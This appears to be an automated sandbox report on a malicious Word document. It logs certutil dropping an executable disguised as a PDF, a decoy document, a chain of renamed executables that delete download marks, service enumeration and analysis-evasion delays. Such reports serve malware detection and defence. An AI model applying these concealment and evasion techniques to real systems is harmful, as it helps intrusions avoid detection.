Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Executable created and started: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Jump to behavior

Drops PE files

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\Public\Ksh1.pdf

Jump to dropped file

Drops PE files to the user directory

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\Public\Ksh1.pdf

Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\Public\Ksh1.pdf

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\Public\Ksh1.pdf

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Creates and opens a fake document (probably a fake document to hide exploiting)

Source: unknown

Process created: cmd line: ksh1.pdf

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	File opened: C:\Windows\SysWOW64\mfcm140\normaliz.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	File opened: C:\Windows\SysWOW64\clip\mmcshext.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	File opened: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	File opened: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	File opened: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	File opened: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	File opened: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	File opened: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: sample1.doc

Stream path 'Data' entropy: 7.97862280177 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to enumerate running services

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: ChangeServiceConfig2W,OpenServiceW,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,	8_2_00645040
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,	9_2_003F5040
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,	10_2_003F5040
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,	11_2_00335040
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,	12_2_004F5040
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,	13_2_00295040
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,	14_2_01C65040
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Code function: ChangeServiceConfig2W,OpenServiceW,GetProcessHeap,HeapFree,EnumServicesStatusExW,GetTickCount,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,	15_2_003F5040

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Window / User API: threadDelayed 9764	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Window / User API: threadDelayed 9750	Jump to behavior
